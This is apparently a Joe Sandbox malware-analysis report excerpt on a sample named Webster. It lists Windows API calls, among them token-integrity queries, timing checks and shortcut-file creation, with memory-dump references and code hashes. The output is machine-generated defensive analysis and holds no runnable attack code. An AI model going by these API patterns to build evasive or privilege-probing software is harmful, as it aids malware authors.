                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2294984445-0
                                                                                  • Opcode ID: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                                                  • Instruction ID: 15d8e47e737ac5bf6d6f06e35c6651d1f90150b3a0963fe53618adcd74727aa8
                                                                                  • Opcode Fuzzy Hash: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                                                  • Instruction Fuzzy Hash: 4D219131A24215AFCB149F398C48F6A3BE9FB05724F148769F921D72E0DB708950CB80
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AD9ED8
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD9F0A
                                                                                  • __itow.LIBCMT ref: 00AD9F22
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AD9F4A
                                                                                  • __itow.LIBCMT ref: 00AD9F5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2983881199-0
                                                                                  • Opcode ID: 8a2474fad3a58293dfa828fa4436a5acb1c07297731dd46a474e3ebeb4caadce
                                                                                  • Instruction ID: 67a355b4bf4f3c076452629f294c76066285191f753927c24aa847a42d4155b4
                                                                                  • Opcode Fuzzy Hash: 8a2474fad3a58293dfa828fa4436a5acb1c07297731dd46a474e3ebeb4caadce
                                                                                  • Instruction Fuzzy Hash: D321C831700305BBDF10AB948D89EEF7BACEB99750F144026F902D7281DA70CD4197E2
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 00AF6159
                                                                                  • GetForegroundWindow.USER32 ref: 00AF6170
                                                                                  • GetDC.USER32(00000000), ref: 00AF61AC
                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00AF61B8
                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00AF61F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                  • String ID:
                                                                                  • API String ID: 4156661090-0
                                                                                  • Opcode ID: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                                                  • Instruction ID: 61ac99d6835c63bf98f6a379f3acdc7f6e51ae0effdf92858ed4999c46857449
                                                                                  • Opcode Fuzzy Hash: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                                                  • Instruction Fuzzy Hash: 1E21A175A00204AFD700EFA5DD84AAABBF9EF88350F04C469F94AD7352CE74AC40CB90
                                                                                  APIs
                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A81738
                                                                                  • BeginPath.GDI32(?), ref: 00A8174F
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A81778
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                                                  • Instruction ID: 1292f7c95c73068c30605fd8bd9a5d83a39e18ae59b0bba78c38f7fbfd67c380
                                                                                  • Opcode Fuzzy Hash: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                                                  • Instruction Fuzzy Hash: 7F219034814208EBDB10EF6ADD48BA97BACF701321F14422AF855971A0DFB09A92CF90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                                                  • Instruction ID: d0674d4143885b1eddd32edde9c75990aa6cb869bba9b885f1077a10d6c13e7e
                                                                                  • Opcode Fuzzy Hash: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                                                  • Instruction Fuzzy Hash: B401D272A442063BD60466109E82FEF73ACDA217A4F544126FE07D7382F760DE10E2E0
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00AE5075
                                                                                  • __beginthreadex.LIBCMT ref: 00AE5093
                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00AE50A8
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AE50BE
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AE50C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                  • String ID:
                                                                                  • API String ID: 3824534824-0
                                                                                  • Opcode ID: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                                                  • Instruction ID: fe4d9d52615985c58f5758798b7e7dce99213db2d33d59035ccedc8d42a6b1a1
                                                                                  • Opcode Fuzzy Hash: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                                                  • Instruction Fuzzy Hash: DC110476D08748BFC7019FB9AC04ADB7BACAB46324F54425AF814D3390DBB58A408BF0
                                                                                  APIs
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                                                  • GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                                                  • Instruction ID: efe9a11bf997c7a3667697ca197377c1f19bf2796b40e7517968755a17df54ad
                                                                                  • Opcode Fuzzy Hash: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                                                  • Instruction Fuzzy Hash: A8016D70210204BFDB205FA6DC48DAB7BBDEF89354B50452AF949C3220DE75DC50CA60
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE581B
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE5829
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5831
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE583B
                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                                                  • Instruction ID: 1a40e382d76f2e35e9ed51b8f0c3915b46440a96824200de4e27cfc53be3f335
                                                                                  • Opcode Fuzzy Hash: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                                                  • Instruction Fuzzy Hash: FB015731C11A1DABCF10AFFAE9489EDBBB8BB08715F408156E501F3140CF7495A0DBA1
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?,?,00AD8073), ref: 00AD7D45
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D60
                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D6E
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?), ref: 00AD7D7E
                                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                                                  • Instruction ID: 1b6207aaaab4ff5e915aa6ad11ef896abce3eb52c69d9cb3d7f235b65b675086
                                                                                  • Opcode Fuzzy Hash: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                                                  • Instruction Fuzzy Hash: 0901BC76615219ABCB105F58DC04BAE7BBEEF44352F508025F84AD7210EBB1EE40CBA0
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                                                  • Instruction ID: f6845c93d7972d7bdf2fc598c844a2773ae8458352662076c0a488591aafad42
                                                                                  • Opcode Fuzzy Hash: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                                                  • Instruction Fuzzy Hash: CEF0AF34210208BFEB101FA59C8CFA73BADFF49754B508026F945C7290CEA49C80DB60
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
                                                                                  • Instruction ID: db4206b66ccf91c6b42a8bd6e4714224c97250ebdfd3de05708c114b171025f3
                                                                                  • Opcode Fuzzy Hash: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
                                                                                  • Instruction Fuzzy Hash: F7F0AF30250204BFEB111FA5EC88FA73BADEF49754F444116F986C7290CFA49E80DB60
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCD90
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ADCDA7
                                                                                  • MessageBeep.USER32(00000000), ref: 00ADCDBF
                                                                                  • KillTimer.USER32(?,0000040A), ref: 00ADCDDB
                                                                                  • EndDialog.USER32(?,00000001), ref: 00ADCDF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                                                  • Instruction ID: 7cbd0687e916d4092b9e6ea74033ee2909a34e935de60c39ffb6429d138cba55
                                                                                  • Opcode Fuzzy Hash: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                                                  • Instruction Fuzzy Hash: 4601A730510709ABEB206B10DD4EB967B79FB00711F40466AB5C3611D1DBF0A994CA90
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 00A8179B
                                                                                  • StrokeAndFillPath.GDI32(?,?,00ABBBC9,00000000,?), ref: 00A817B7
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00A817CA
                                                                                  • DeleteObject.GDI32 ref: 00A817DD
                                                                                  • StrokePath.GDI32(?), ref: 00A817F8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                                                  • Instruction ID: 564344e1925db18af15cea399264493d2537e59fd244aecee19d7b190273c074
                                                                                  • Opcode Fuzzy Hash: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                                                  • Instruction Fuzzy Hash: A4F03C3404820CEBDB11AF2AED4C7983FA8B702322F44C258F42A961F0CF704A96DF50
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AECA75
                                                                                  • CoCreateInstance.OLE32(00B13D3C,00000000,00000001,00B13BAC,?), ref: 00AECA8D
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  • CoUninitialize.OLE32 ref: 00AECCFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2683427295-24824748
                                                                                  • Opcode ID: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                                                  • Instruction ID: 49dd0fd7a6dbfe742484379ca4cbb3c5759464f33d9e35b42db2acecfc6179d7
                                                                                  • Opcode Fuzzy Hash: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                                                  • Instruction Fuzzy Hash: 7AA13D71104206AFD700EF64C991EAFB7E8EF98754F40491CF155972A2EB70EE49CB92
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00A91680: _memmove.LIBCMT ref: 00A916DB
                                                                                  • __swprintf.LIBCMT ref: 00A8E598
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A8E431
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 1943609520-557222456
                                                                                  • Opcode ID: c9db09ead774819e78cc787b2e4b34746e3694c31a14f6f5ce8a8a4866873e44
                                                                                  • Instruction ID: 37942479711b158f61cb7b12ef755238590351cbb19244e760368446a3b3f0c1
                                                                                  • Opcode Fuzzy Hash: c9db09ead774819e78cc787b2e4b34746e3694c31a14f6f5ce8a8a4866873e44
                                                                                  • Instruction Fuzzy Hash: 24917C71608201AFCB18FF24C995D6EB7F8EF95700F45491DF4869B2A1EB20ED44CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$+
                                                                                  • API String ID: 0-2552117581
                                                                                  • Opcode ID: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                                                  • Instruction ID: d6bb90b0fbc38e75e00de96e453c6eab70d0257ee7ac2a8ba323710e111e293f
